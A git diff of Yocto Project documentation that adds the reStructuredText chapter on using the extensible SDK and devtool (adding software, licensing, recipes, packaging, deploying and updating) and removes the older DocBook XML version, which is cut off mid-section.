+   RDEPENDS_${PN} += "dependency1 dependency2 ..."
+
+.. note::
+
+   The
+   devtool add
+   command often cannot distinguish between mandatory and optional
+   dependencies. Consequently, some of the detected dependencies might
+   in fact be optional. When in doubt, consult the documentation or the
+   configure script for the software the recipe is building for further
+   details. In some cases, you might find you can substitute the
+   dependency with an option that disables the associated functionality
+   passed to the configure script.
+
+.. _sdk-license-detection:
+
+License Detection
+-----------------
+
+The ``devtool add`` command attempts to determine if the software you
+are adding is able to be distributed under a common, open-source
+license. If so, the command sets the
+:term:`LICENSE` value accordingly.
+You should double-check the value added by the command against the
+documentation or source files for the software you are building and, if
+necessary, update that ``LICENSE`` value.
+
+The ``devtool add`` command also sets the
+:term:`LIC_FILES_CHKSUM`
+value to point to all files that appear to be license-related. Realize
+that license statements often appear in comments at the top of source
+files or within the documentation. In such cases, the command does not
+recognize those license statements. Consequently, you might need to
+amend the ``LIC_FILES_CHKSUM`` variable to point to one or more of those
+comments if present. Setting ``LIC_FILES_CHKSUM`` is particularly
+important for third-party software. The mechanism attempts to ensure
+correct licensing should you upgrade the recipe to a newer upstream
+version in future. Any change in licensing is detected and you receive
+an error prompting you to check the license text again.
+
+If the ``devtool add`` command cannot determine licensing information,
+``devtool`` sets the ``LICENSE`` value to "CLOSED" and leaves the
+``LIC_FILES_CHKSUM`` value unset. This behavior allows you to continue
+with development even though the settings are unlikely to be correct in
+all cases. You should check the documentation or source files for the
+software you are building to determine the actual license.
+
+.. _sdk-adding-makefile-only-software:
+
+Adding Makefile-Only Software
+-----------------------------
+
+The use of Make by itself is very common in both proprietary and
+open-source software. Unfortunately, Makefiles are often not written
+with cross-compilation in mind. Thus, ``devtool add`` often cannot do
+very much to ensure that these Makefiles build correctly. It is very
+common, for example, to explicitly call ``gcc`` instead of using the
+:term:`CC` variable. Usually, in a
+cross-compilation environment, ``gcc`` is the compiler for the build
+host and the cross-compiler is named something similar to
+``arm-poky-linux-gnueabi-gcc`` and might require arguments (e.g. to
+point to the associated sysroot for the target machine).
+
+When writing a recipe for Makefile-only software, keep the following in
+mind:
+
+-  You probably need to patch the Makefile to use variables instead of
+   hardcoding tools within the toolchain such as ``gcc`` and ``g++``.
+
+-  The environment in which Make runs is set up with various standard
+   variables for compilation (e.g. ``CC``, ``CXX``, and so forth) in a
+   similar manner to the environment set up by the SDK's environment
+   setup script. One easy way to see these variables is to run the
+   ``devtool build`` command on the recipe and then look in
+   ``oe-logs/run.do_compile``. Towards the top of this file, a list of
+   environment variables exists that are being set. You can take
+   advantage of these variables within the Makefile.
+
+-  If the Makefile sets a default for a variable using "=", that default
+   overrides the value set in the environment, which is usually not
+   desirable. For this case, you can either patch the Makefile so it
+   sets the default using the "?=" operator, or you can alternatively
+   force the value on the ``make`` command line. To force the value on
+   the command line, add the variable setting to
+   :term:`EXTRA_OEMAKE` or
+   :term:`PACKAGECONFIG_CONFARGS`
+   within the recipe. Here is an example using ``EXTRA_OEMAKE``:
+   ::
+
+      EXTRA_OEMAKE += "'CC=${CC}' 'CXX=${CXX}'"
+
+   In the above example,
+   single quotes are used around the variable settings as the values are
+   likely to contain spaces because required default options are passed
+   to the compiler.
+
+-  Hardcoding paths inside Makefiles is often problematic in a
+   cross-compilation environment. This is particularly true because
+   those hardcoded paths often point to locations on the build host and
+   thus will either be read-only or will introduce contamination into
+   the cross-compilation because they are specific to the build host
+   rather than the target. Patching the Makefile to use prefix variables
+   or other path variables is usually the way to handle this situation.
+
+-  Sometimes a Makefile runs target-specific commands such as
+   ``ldconfig``. For such cases, you might be able to apply patches that
+   remove these commands from the Makefile.
+
+.. _sdk-adding-native-tools:
+
+Adding Native Tools
+-------------------
+
+Often, you need to build additional tools that run on the :term:`Build
+Host` as opposed to
+the target. You should indicate this requirement by using one of the
+following methods when you run ``devtool add``:
+
+-  Specify the name of the recipe such that it ends with "-native".
+   Specifying the name like this produces a recipe that only builds for
+   the build host.
+
+-  Specify the "DASHDASHalso-native" option with the ``devtool add``
+   command. Specifying this option creates a recipe file that still
+   builds for the target but also creates a variant with a "-native"
+   suffix that builds for the build host.
+
+.. note::
+
+   If you need to add a tool that is shipped as part of a source tree
+   that builds code for the target, you can typically accomplish this by
+   building the native and target parts separately rather than within
+   the same compilation process. Realize though that with the
+   "DASHDASHalso-native" option, you can add the tool using just one
+   recipe file.
+
+.. _sdk-adding-node-js-modules:
+
+Adding Node.js Modules
+----------------------
+
+You can use the ``devtool add`` command two different ways to add
+Node.js modules: 1) Through ``npm`` and, 2) from a repository or local
+source.
+
+Use the following form to add Node.js modules through ``npm``:
+::
+
+   $ devtool add "npm://registry.npmjs.org;name=forever;version=0.15.1"
+
+The name and
+version parameters are mandatory. Lockdown and shrinkwrap files are
+generated and pointed to by the recipe in order to freeze the version
+that is fetched for the dependencies according to the first time. This
+also saves checksums that are verified on future fetches. Together,
+these behaviors ensure the reproducibility and integrity of the build.
+
+.. note::
+
+   -  You must use quotes around the URL. The ``devtool add`` does not
+      require the quotes, but the shell considers ";" as a splitter
+      between multiple commands. Thus, without the quotes,
+      ``devtool add`` does not receive the other parts, which results in
+      several "command not found" errors.
+
+   -  In order to support adding Node.js modules, a ``nodejs`` recipe
+      must be part of your SDK.
+
+As mentioned earlier, you can also add Node.js modules directly from a
+repository or local source tree. To add modules this way, use
+``devtool add`` in the following form:
+::
+
+   $ devtool add https://github.com/diversario/node-ssdp
+
+In this example, ``devtool``
+fetches the specified Git repository, detects the code as Node.js code,
+fetches dependencies using ``npm``, and sets
+:term:`SRC_URI` accordingly.
+
+.. _sdk-working-with-recipes:
+
+Working With Recipes
+====================
+
+When building a recipe using the ``devtool build`` command, the typical
+build progresses as follows:
+
+1. Fetch the source
+
+2. Unpack the source
+
+3. Configure the source
+
+4. Compile the source
+
+5. Install the build output
+
+6. Package the installed output
+
+For recipes in the workspace, fetching and unpacking is disabled as the
+source tree has already been prepared and is persistent. Each of these
+build steps is defined as a function (task), usually with a "do\_" prefix
+(e.g. :ref:`ref-tasks-fetch`,
+:ref:`ref-tasks-unpack`, and so
+forth). These functions are typically shell scripts but can instead be
+written in Python.
+
+If you look at the contents of a recipe, you will see that the recipe
+does not include complete instructions for building the software.
+Instead, common functionality is encapsulated in classes inherited with
+the ``inherit`` directive. This technique leaves the recipe to describe
+just the things that are specific to the software being built. A
+:ref:`base <ref-classes-base>` class exists that
+is implicitly inherited by all recipes and provides the functionality
+that most recipes typically need.
+
+The remainder of this section presents information useful when working
+with recipes.
+
+.. _sdk-finding-logs-and-work-files:
+
+Finding Logs and Work Files
+---------------------------
+
+After the first run of the ``devtool build`` command, recipes that were
+previously created using the ``devtool add`` command or whose sources
+were modified using the ``devtool modify`` command contain symbolic
+links created within the source tree:
+
+-  ``oe-logs``: This link points to the directory in which log files and
+   run scripts for each build step are created.
+
+-  ``oe-workdir``: This link points to the temporary work area for the
+   recipe. The following locations under ``oe-workdir`` are particularly
+   useful:
+
+   -  ``image/``: Contains all of the files installed during the
+      :ref:`ref-tasks-install` stage.
+      Within a recipe, this directory is referred to by the expression
+      ``${``\ :term:`D`\ ``}``.
+
+   -  ``sysroot-destdir/``: Contains a subset of files installed within
+      ``do_install`` that have been put into the shared sysroot. For
+      more information, see the "`Sharing Files Between
+      Recipes <#sdk-sharing-files-between-recipes>`__" section.
+
+   -  ``packages-split/``: Contains subdirectories for each package
+      produced by the recipe. For more information, see the
+      "`Packaging <#sdk-packaging>`__" section.
+
+You can use these links to get more information on what is happening at
+each build step.
+
+.. _sdk-setting-configure-arguments:
+
+Setting Configure Arguments
+---------------------------
+
+If the software your recipe is building uses GNU autoconf, then a fixed
+set of arguments is passed to it to enable cross-compilation plus any
+extras specified by
+:term:`EXTRA_OECONF` or
+:term:`PACKAGECONFIG_CONFARGS`
+set within the recipe. If you wish to pass additional options, add them
+to ``EXTRA_OECONF`` or ``PACKAGECONFIG_CONFARGS``. Other supported build
+tools have similar variables (e.g.
+:term:`EXTRA_OECMAKE` for
+CMake, :term:`EXTRA_OESCONS`
+for Scons, and so forth). If you need to pass anything on the ``make``
+command line, you can use ``EXTRA_OEMAKE`` or the
+:term:`PACKAGECONFIG_CONFARGS`
+variables to do so.
+
+You can use the ``devtool configure-help`` command to help you set the
+arguments listed in the previous paragraph. The command determines the
+exact options being passed, and shows them to you along with any custom
+arguments specified through ``EXTRA_OECONF`` or
+``PACKAGECONFIG_CONFARGS``. If applicable, the command also shows you
+the output of the configure script's "DASHDASHhelp" option as a
+reference.
+
+.. _sdk-sharing-files-between-recipes:
+
+Sharing Files Between Recipes
+-----------------------------
+
+Recipes often need to use files provided by other recipes on the
+:term:`Build Host`. For example,
+an application linking to a common library needs access to the library
+itself and its associated headers. The way this access is accomplished
+within the extensible SDK is through the sysroot. One sysroot exists per
+"machine" for which the SDK is being built. In practical terms, this
+means a sysroot exists for the target machine, and a sysroot exists for
+the build host.
+
+Recipes should never write files directly into the sysroot. Instead,
+files should be installed into standard locations during the
+:ref:`ref-tasks-install` task within
+the ``${``\ :term:`D`\ ``}`` directory. A
+subset of these files automatically goes into the sysroot. The reason
+for this limitation is that almost all files that go into the sysroot
+are cataloged in manifests in order to ensure they can be removed later
+when a recipe is modified or removed. Thus, the sysroot is able to
+remain free from stale files.
+
+.. _sdk-packaging:
+
+Packaging
+---------
+
+Packaging is not always particularly relevant within the extensible SDK.
+However, if you examine how build output gets into the final image on
+the target device, it is important to understand packaging because the
+contents of the image are expressed in terms of packages and not
+recipes.
+
+During the :ref:`ref-tasks-package`
+task, files installed during the
+:ref:`ref-tasks-install` task are
+split into one main package, which is almost always named the same as
+the recipe, and into several other packages. This separation exists
+because not all of those installed files are useful in every image. For
+example, you probably do not need any of the documentation installed in
+a production image. Consequently, for each recipe the documentation
+files are separated into a ``-doc`` package. Recipes that package
+software containing optional modules or plugins might undergo additional
+package splitting as well.
+
+After building a recipe, you can see where files have gone by looking in
+the ``oe-workdir/packages-split`` directory, which contains a
+subdirectory for each package. Apart from some advanced cases, the
+:term:`PACKAGES` and
+:term:`FILES` variables controls
+splitting. The ``PACKAGES`` variable lists all of the packages to be
+produced, while the ``FILES`` variable specifies which files to include
+in each package by using an override to specify the package. For
+example, ``FILES_${PN}`` specifies the files to go into the main package
+(i.e. the main package has the same name as the recipe and
+``${``\ :term:`PN`\ ``}`` evaluates to the
+recipe name). The order of the ``PACKAGES`` value is significant. For
+each installed file, the first package whose ``FILES`` value matches the
+file is the package into which the file goes. Defaults exist for both
+the ``PACKAGES`` and ``FILES`` variables. Consequently, you might find
+you do not even need to set these variables in your recipe unless the
+software the recipe is building installs files into non-standard
+locations.
+
+.. _sdk-restoring-the-target-device-to-its-original-state:
+
+Restoring the Target Device to its Original State
+=================================================
+
+If you use the ``devtool deploy-target`` command to write a recipe's
+build output to the target, and you are working on an existing component
+of the system, then you might find yourself in a situation where you
+need to restore the original files that existed prior to running the
+``devtool deploy-target`` command. Because the ``devtool deploy-target``
+command backs up any files it overwrites, you can use the
+``devtool undeploy-target`` command to restore those files and remove
+any other files the recipe deployed. Consider the following example:
+::
+
+   $ devtool undeploy-target lighttpd root@192.168.7.2
+
+If you have deployed
+multiple applications, you can remove them all using the "-a" option
+thus restoring the target device to its original state:
+::
+
+   $ devtool undeploy-target -a root@192.168.7.2
+
+Information about files deployed to
+the target as well as any backed up files are stored on the target
+itself. This storage, of course, requires some additional space on the
+target machine.
+
+.. note::
+
+   The
+   devtool deploy-target
+   and
+   devtool undeploy-target
+   commands do not currently interact with any package management system
+   on the target device (e.g. RPM or OPKG). Consequently, you should not
+   intermingle
+   devtool deploy-target
+   and package manager operations on the target device. Doing so could
+   result in a conflicting set of files.
+
+.. _sdk-installing-additional-items-into-the-extensible-sdk:
+
+Installing Additional Items Into the Extensible SDK
+===================================================
+
+Out of the box the extensible SDK typically only comes with a small
+number of tools and libraries. A minimal SDK starts mostly empty and is
+populated on-demand. Sometimes you must explicitly install extra items
+into the SDK. If you need these extra items, you can first search for
+the items using the ``devtool search`` command. For example, suppose you
+need to link to libGL but you are not sure which recipe provides libGL.
+You can use the following command to find out:
+::
+
+   $ devtool search libGL mesa
+
+A free implementation of the OpenGL API Once you know the recipe
+(i.e. ``mesa`` in this example), you can install it:
+::
+
+   $ devtool sdk-install mesa
+
+By default, the ``devtool sdk-install`` command assumes
+the item is available in pre-built form from your SDK provider. If the
+item is not available and it is acceptable to build the item from
+source, you can add the "-s" option as follows:
+::
+
+   $ devtool sdk-install -s mesa
+
+It is important to remember that building the item from source
+takes significantly longer than installing the pre-built artifact. Also,
+if no recipe exists for the item you want to add to the SDK, you must
+instead add the item using the ``devtool add`` command.
+
+.. _sdk-applying-updates-to-an-installed-extensible-sdk:
+
+Applying Updates to an Installed Extensible SDK
+===============================================
+
+If you are working with an installed extensible SDK that gets
+occasionally updated (e.g. a third-party SDK), then you will need to
+manually "pull down" the updates into the installed SDK.
+
+To update your installed SDK, use ``devtool`` as follows:
+::
+
+   $ devtool sdk-update
+
+The previous command assumes your SDK provider has set the
+default update URL for you through the
+:term:`SDK_UPDATE_URL`
+variable as described in the "`Providing Updates to the Extensible SDK
+After
+Installation <#sdk-providing-updates-to-the-extensible-sdk-after-installation>`__"
+section. If the SDK provider has not set that default URL, you need to
+specify it yourself in the command as follows: $ devtool sdk-update
+path_to_update_directory
+
+.. note::
+
+   The URL needs to point specifically to a published SDK and not to an
+   SDK installer that you would download and install.
+
+.. _sdk-creating-a-derivative-sdk-with-additional-components:
+
+Creating a Derivative SDK With Additional Components
+====================================================
+
+You might need to produce an SDK that contains your own custom
+libraries. A good example would be if you were a vendor with customers
+that use your SDK to build their own platform-specific software and
+those customers need an SDK that has custom libraries. In such a case,
+you can produce a derivative SDK based on the currently installed SDK
+fairly easily by following these steps:
+
+1. If necessary, install an extensible SDK that you want to use as a
+   base for your derivative SDK.
+
+2. Source the environment script for the SDK.
+
+3. Add the extra libraries or other components you want by using the
+   ``devtool add`` command.
+
+4. Run the ``devtool build-sdk`` command.
+
+The previous steps take the recipes added to the workspace and construct
+a new SDK installer that contains those recipes and the resulting binary
+artifacts. The recipes go into their own separate layer in the
+constructed derivative SDK, which leaves the workspace clean and ready
+for users to add their own recipes.
diff --git a/documentation/sdk-manual/sdk-extensible.xml b/documentation/sdk-manual/sdk-extensible.xml
deleted file mode 100644
index 94d2a241fe..0000000000
--- a/documentation/sdk-manual/sdk-extensible.xml
+++ /dev/null
@@ -1,1846 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='sdk-extensible'>
-
-    <title>Using the Extensible SDK</title>
-
-    <para>
-        This chapter describes the extensible SDK and how to install it.
-        Information covers the pieces of the SDK, how to install it, and
-        presents a look at using the <filename>devtool</filename>
-        functionality.
-        The extensible SDK makes it easy to add new applications and libraries
-        to an image, modify the source for an existing component, test
-        changes on the target hardware, and ease integration into the rest of
-        the
-        <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>.
-        <note>
-            For a side-by-side comparison of main features supported for an
-            extensible SDK as compared to a standard SDK, see the
-            "<link linkend='sdk-manual-intro'>Introduction</link>"
-            section.
-        </note>
-    </para>
-
-    <para>
-        In addition to the functionality available through
-        <filename>devtool</filename>, you can alternatively make use of the
-        toolchain directly, for example from Makefile and Autotools.
-        See the
-        "<link linkend='sdk-working-projects'>Using the SDK Toolchain Directly</link>"
-        chapter for more information.
-    </para>
-
-    <section id='sdk-extensible-sdk-intro'>
-        <title>Why use the Extensible SDK and What is in It?</title>
-
-        <para>
-            The extensible SDK provides a cross-development toolchain and
-            libraries tailored to the contents of a specific image.
-            You would use the Extensible SDK if you want a toolchain experience
-            supplemented with the powerful set of <filename>devtool</filename>
-            commands tailored for the Yocto Project environment.
-        </para>
-
-        <para>
-            The installed extensible SDK consists of several files and
-            directories.
-            Basically, it contains an SDK environment setup script, some
-            configuration files, an internal build system, and the
-            <filename>devtool</filename> functionality.
-        </para>
-    </section>
-
-    <section id='sdk-installing-the-extensible-sdk'>
-        <title>Installing the Extensible SDK</title>
-
-        <para>
-            The first thing you need to do is install the SDK on your
-            <ulink url='&YOCTO_DOCS_REF_URL;#hardware-build-system-term'>Build Host</ulink>
-            by running the <filename>*.sh</filename> installation script.
-        </para>
-
-        <para>
-            You can download a tarball installer, which includes the
-            pre-built toolchain, the <filename>runqemu</filename>
-            script, the internal build system, <filename>devtool</filename>,
-            and support files from the appropriate
-            <ulink url='&YOCTO_TOOLCHAIN_DL_URL;'>toolchain</ulink>
-            directory within the Index of Releases.
-            Toolchains are available for several 32-bit and 64-bit
-            architectures with the <filename>x86_64</filename> directories,
-            respectively.
-            The toolchains the Yocto Project provides are based off the
-            <filename>core-image-sato</filename> and
-            <filename>core-image-minimal</filename> images and contain
-            libraries appropriate for developing against that image.
-        </para>
-
-        <para>
-            The names of the tarball installer scripts are such that a
-            string representing the host system appears first in the
-            filename and then is immediately followed by a string
-            representing the target architecture.
-            An extensible SDK has the string "-ext" as part of the name.
-            Following is the general form:
-            <literallayout class='monospaced'>
-     poky-glibc-<replaceable>host_system</replaceable>-<replaceable>image_type</replaceable>-<replaceable>arch</replaceable>-toolchain-ext-<replaceable>release_version</replaceable>.sh
-
-     Where:
-         <replaceable>host_system</replaceable> is a string representing your development system:
-
-                    i686 or x86_64.
-
-         <replaceable>image_type</replaceable> is the image for which the SDK was built:
-
-                    core-image-sato or core-image-minimal
-
-         <replaceable>arch</replaceable> is a string representing the tuned target architecture:
-
-                    aarch64, armv5e, core2-64, i586, mips32r2, mips64, ppc7400, or cortexa8hf-neon
-
-         <replaceable>release_version</replaceable> is a string representing the release number of the Yocto Project:
-
-                    &DISTRO;, &DISTRO;+snapshot
-            </literallayout>
-            For example, the following SDK installer is for a 64-bit
-            development host system and a i586-tuned target architecture
-            based off the SDK for <filename>core-image-sato</filename> and
-            using the current &DISTRO; snapshot:
-            <literallayout class='monospaced'>
-     poky-glibc-x86_64-core-image-sato-i586-toolchain-ext-&DISTRO;.sh
-            </literallayout>
-            <note>
-                As an alternative to downloading an SDK, you can build the
-                SDK installer.
-                For information on building the installer, see the
-                "<link linkend='sdk-building-an-sdk-installer'>Building an SDK Installer</link>"
-                section.
-            </note>
-        </para>
-
-        <para>
-            The SDK and toolchains are self-contained and by default are
-            installed into the <filename>poky_sdk</filename> folder in your
-            home directory.
-            You can choose to install the extensible SDK in any location when
-            you run the installer.
-            However, because files need to be written under that directory
-            during the normal course of operation, the location you choose
-            for installation must be writable for whichever
-            users need to use the SDK.
-        </para>
-
-        <para>
-            The following command shows how to run the installer given a
-            toolchain tarball for a 64-bit x86 development host system and
-            a 64-bit x86 target architecture.
-            The example assumes the SDK installer is located in
-            <filename>~/Downloads/</filename> and has execution rights.
-            <note>
-                If you do not have write permissions for the directory
-                into which you are installing the SDK, the installer
-                notifies you and exits.
-                For that case, set up the proper permissions in the directory
-                and run the installer again.
-            </note>
-            <literallayout class='monospaced'>
-     $ ./Downloads/poky-glibc-x86_64-core-image-minimal-core2-64-toolchain-ext-2.5.sh
-     Poky (Yocto Project Reference Distro) Extensible SDK installer version 2.5
-     ==========================================================================
-     Enter target directory for SDK (default: ~/poky_sdk):
-     You are about to install the SDK to "/home/scottrif/poky_sdk". Proceed [Y/n]? Y
-     Extracting SDK..............done
-     Setting it up...
-     Extracting buildtools...
-     Preparing build system...
-     Parsing recipes: 100% |##################################################################| Time: 0:00:52
-     Initialising tasks: 100% |###############################################################| Time: 0:00:00
-     Checking sstate mirror object availability: 100% |#######################################| Time: 0:00:00
-     Loading cache: 100% |####################################################################| Time: 0:00:00
-     Initialising tasks: 100% |###############################################################| Time: 0:00:00
-     done
-     SDK has been successfully set up and is ready to be used.
-     Each time you wish to use the SDK in a new shell session, you need to source the environment setup script e.g.
-      $ . /home/scottrif/poky_sdk/environment-setup-core2-64-poky-linux
-
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='sdk-running-the-extensible-sdk-environment-setup-script'>
-        <title>Running the Extensible SDK Environment Setup Script</title>
-
-        <para>
-            Once you have the SDK installed, you must run the SDK environment
-            setup script before you can actually use the SDK.
-            This setup script resides in the directory you chose when you
-            installed the SDK, which is either the default
-            <filename>poky_sdk</filename> directory or the directory you
-            chose during installation.
-        </para>
-
-        <para>
-            Before running the script, be sure it is the one that matches the
-            architecture for which you are developing.
-            Environment setup scripts begin with the string
-            "<filename>environment-setup</filename>" and include as part of
-            their name the tuned target architecture.
-            As an example, the following commands set the working directory
-            to where the SDK was installed and then source the environment
-            setup script.
-            In this example, the setup script is for an IA-based
-            target machine using i586 tuning:
-            <literallayout class='monospaced'>
-     $ cd /home/scottrif/poky_sdk
-     $ source environment-setup-core2-64-poky-linux
-     SDK environment now set up; additionally you may now run devtool to perform development tasks.
-     Run devtool --help for further details.
-            </literallayout>
-            Running the setup script defines many environment variables needed
-            in order to use the SDK (e.g. <filename>PATH</filename>,
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-CC'><filename>CC</filename></ulink>,
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-LD'><filename>LD</filename></ulink>,
-            and so forth).
-            If you want to see all the environment variables the script
-            exports, examine the installation file itself.
-        </para>
-    </section>
-
-    <section id='using-devtool-in-your-sdk-workflow'>
-        <title>Using <filename>devtool</filename> in Your SDK Workflow</title>
-
-        <para>
-            The cornerstone of the extensible SDK is a command-line tool
-            called <filename>devtool</filename>.
-            This tool provides a number of features that help
-            you build, test and package software within the extensible SDK, and
-            optionally integrate it into an image built by the OpenEmbedded
-            build system.
-            <note><title>Tip</title>
-                The use of <filename>devtool</filename> is not limited to
-                the extensible SDK.
-                You can use <filename>devtool</filename> to help you easily
-                develop any project whose build output must be part of an
-                image built using the build system.
-            </note>
-        </para>
-
-        <para>
-            The <filename>devtool</filename> command line is organized
-            similarly to
-            <ulink url='&YOCTO_DOCS_OM_URL;#git'>Git</ulink> in that it
-            has a number of sub-commands for each function.
-            You can run <filename>devtool --help</filename> to see all the
-            commands.
-            <note>
-                See the
-                "<ulink url='&YOCTO_DOCS_REF_URL;#ref-devtool-reference'><filename>devtool</filename>&nbsp;Quick Reference</ulink>"
-                in the Yocto Project Reference Manual for a
-                <filename>devtool</filename> quick reference.
-            </note>
-        </para>
-
-        <para>
-            Three <filename>devtool</filename> subcommands exist that provide
-            entry-points into development:
-            <itemizedlist>
-                <listitem><para>
-                    <emphasis><filename>devtool add</filename></emphasis>:
-                    Assists in adding new software to be built.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>devtool modify</filename></emphasis>:
-                    Sets up an environment to enable you to modify the source of
-                    an existing component.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>devtool upgrade</filename></emphasis>:
-                    Updates an existing recipe so that you can build it for
-                    an updated set of source files.
-                    </para></listitem>
-            </itemizedlist>
-            As with the build system, "recipes" represent software packages
-            within <filename>devtool</filename>.
-            When you use <filename>devtool add</filename>, a recipe is
-            automatically created.
-            When you use <filename>devtool modify</filename>, the specified
-            existing recipe is used in order to determine where to get the
-            source code and how to patch it.
-            In both cases, an environment is set up so that when you build the
-            recipe a source tree that is under your control is used in order to
-            allow you to make changes to the source as desired.
-            By default, new recipes and the source go into a "workspace"
-            directory under the SDK.
-        </para>
-
-        <para>
-            The remainder of this section presents the
-            <filename>devtool add</filename>,
-            <filename>devtool modify</filename>, and
-            <filename>devtool upgrade</filename> workflows.
-        </para>
-
-        <section id='sdk-use-devtool-to-add-an-application'>
-            <title>Use <filename>devtool add</filename> to Add an Application</title>
-
-            <para>
-                The <filename>devtool add</filename> command generates
-                a new recipe based on existing source code.
-                This command takes advantage of the
-                <ulink url='&YOCTO_DOCS_REF_URL;#devtool-the-workspace-layer-structure'>workspace</ulink>
-                layer that many <filename>devtool</filename> commands
-                use.
-                The command is flexible enough to allow you to extract source
-                code into both the workspace or a separate local Git repository
-                and to use existing code that does not need to be extracted.
-            </para>
-
-            <para>
-                Depending on your particular scenario, the arguments and options
-                you use with <filename>devtool add</filename> form different
-                combinations.
-                The following diagram shows common development flows
-                you would use with the <filename>devtool add</filename>
-                command:
-            </para>
-
-            <para>
-                <imagedata fileref="figures/sdk-devtool-add-flow.png" align="center" />
-            </para>
-
-            <para>
-                <orderedlist>
-                    <listitem><para><emphasis>Generating the New Recipe</emphasis>:
-                        The top part of the flow shows three scenarios by which
-                        you could use <filename>devtool add</filename> to
-                        generate a recipe based on existing source code.</para>
-
-                        <para>In a shared development environment, it is
-                        typical for other developers to be responsible for
-                        various areas of source code.
-                        As a developer, you are probably interested in using
-                        that source code as part of your development within
-                        the Yocto Project.
-                        All you need is access to the code, a recipe, and a
-                        controlled area in which to do your work.</para>
-
-                        <para>Within the diagram, three possible scenarios
-                        feed into the <filename>devtool add</filename> workflow:
-                        <itemizedlist>
-                            <listitem><para>
-                                <emphasis>Left</emphasis>:
-                                The left scenario in the figure represents a
-                                common situation where the source code does not
-                                exist locally and needs to be extracted.
-                                In this situation, the source code is extracted
-                                to the default workspace - you do not
-                                want the files in some specific location
-                                outside of the workspace.
-                                Thus, everything you need will be located in
-                                the workspace:
-                                <literallayout class='monospaced'>
-     $ devtool add <replaceable>recipe fetchuri</replaceable>
-                                </literallayout>
-                                With this command, <filename>devtool</filename>
-                                extracts the upstream source files into a local
-                                Git repository within the
-                                <filename>sources</filename> folder.
-                                The command then creates a recipe named
-                                <replaceable>recipe</replaceable> and a
-                                corresponding append file in the workspace.
-                                If you do not provide
-                                <replaceable>recipe</replaceable>, the command
-                                makes an attempt to determine the recipe name.
-                                </para></listitem>
-                            <listitem><para>
-                                <emphasis>Middle</emphasis>:
-                                The middle scenario in the figure also
-                                represents a situation where the source code
-                                does not exist locally.
-                                In this case, the code is again upstream
-                                and needs to be extracted to some
-                                local area - this time outside of the default
-                                workspace.
-                                <note>
-                                    If required, <filename>devtool</filename>
-                                    always creates
-                                    a Git repository locally during the
-                                    extraction.
-                                </note>
-                                Furthermore, the first positional argument
-                                <replaceable>srctree</replaceable> in this
-                                case identifies where the
-                                <filename>devtool add</filename> command
-                                will locate the extracted code outside of the
-                                workspace.
-                                You need to specify an empty directory:
-                                <literallayout class='monospaced'>
-     $ devtool add <replaceable>recipe srctree fetchuri</replaceable>
-                                </literallayout>
-                                In summary, the source code is pulled from
-                                <replaceable>fetchuri</replaceable> and
-                                extracted into the location defined by
-                                <replaceable>srctree</replaceable> as a local
-                                Git repository.</para>
-
-                                <para>Within workspace,
-                                <filename>devtool</filename> creates a
-                                recipe named <replaceable>recipe</replaceable>
-                                along with an associated append file.
-                                </para></listitem>
-                            <listitem><para>
-                                <emphasis>Right</emphasis>:
-                                The right scenario in the figure represents a
-                                situation where the
-                                <replaceable>srctree</replaceable> has been
-                                previously prepared outside of the
-                                <filename>devtool</filename> workspace.</para>
-
-                                <para>The following command provides a new
-                                recipe name and identifies the existing source
-                                tree location:
-                                <literallayout class='monospaced'>
-     $ devtool add <replaceable>recipe srctree</replaceable>
-                                </literallayout>
-                                The command examines the source code and
-                                creates a recipe named
-                                <replaceable>recipe</replaceable> for the code
-                                and places the recipe into the workspace.
-                                </para>
-
-                                <para>Because the extracted source code already
-                                exists, <filename>devtool</filename> does not
-                                try to relocate the source code into the
-                                workspace - only the new recipe is placed
-                                in the workspace.</para>
-
-                                <para>Aside from a recipe folder, the command
-                                also creates an associated append folder and
-                                places an initial
-                                <filename>*.bbappend</filename> file within.
-                                </para></listitem>
-                        </itemizedlist>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Edit the Recipe</emphasis>:
-                        You can use <filename>devtool edit-recipe</filename>
-                        to open up the editor as defined by the
-                        <filename>$EDITOR</filename> environment variable
-                        and modify the file:
-                        <literallayout class='monospaced'>
-     $ devtool edit-recipe <replaceable>recipe</replaceable>
-                        </literallayout>
-                        From within the editor, you can make modifications to
-                        the recipe that take affect when you build it later.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Build the Recipe or Rebuild the Image</emphasis>:
-                        The next step you take depends on what you are going
-                        to do with the new code.</para>
-
-                        <para>If you need to eventually move the build output
-                        to the target hardware, use the following
-                        <filename>devtool</filename> command:
-                        <literallayout class='monospaced'>
-     $ devtool build <replaceable>recipe</replaceable>
-                        </literallayout></para>
-
-                        <para>On the other hand, if you want an image to
-                        contain the recipe's packages from the workspace
-                        for immediate deployment onto a device (e.g. for
-                        testing purposes), you can use
-                        the <filename>devtool build-image</filename> command:
-                        <literallayout class='monospaced'>
-     $ devtool build-image <replaceable>image</replaceable>
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Deploy the Build Output</emphasis>:
-                        When you use the <filename>devtool build</filename>
-                        command to build out your recipe, you probably want to
-                        see if the resulting build output works as expected
-                        on the target hardware.
-                        <note>
-                            This step assumes you have a previously built
-                            image that is already either running in QEMU or
-                            is running on actual hardware.
-                            Also, it is assumed that for deployment of the
-                            image to the target, SSH is installed in the image
-                            and, if the image is running on real hardware,
-                            you have network access to and from your
-                            development machine.
-                        </note>
-                        You can deploy your build output to that target
-                        hardware by using the
-                        <filename>devtool deploy-target</filename> command:
-                        <literallayout class='monospaced'>
-     $ devtool deploy-target <replaceable>recipe target</replaceable>
-                        </literallayout>
-                        The <replaceable>target</replaceable> is a live target
-                        machine running as an SSH server.</para>
-
-                        <para>You can, of course, also deploy the image you
-                        build to actual hardware by using the
-                        <filename>devtool build-image</filename> command.
-                        However, <filename>devtool</filename> does not provide
-                        a specific command that allows you to deploy the
-                        image to actual hardware.
-                        </para></listitem>
-                    <listitem><para>
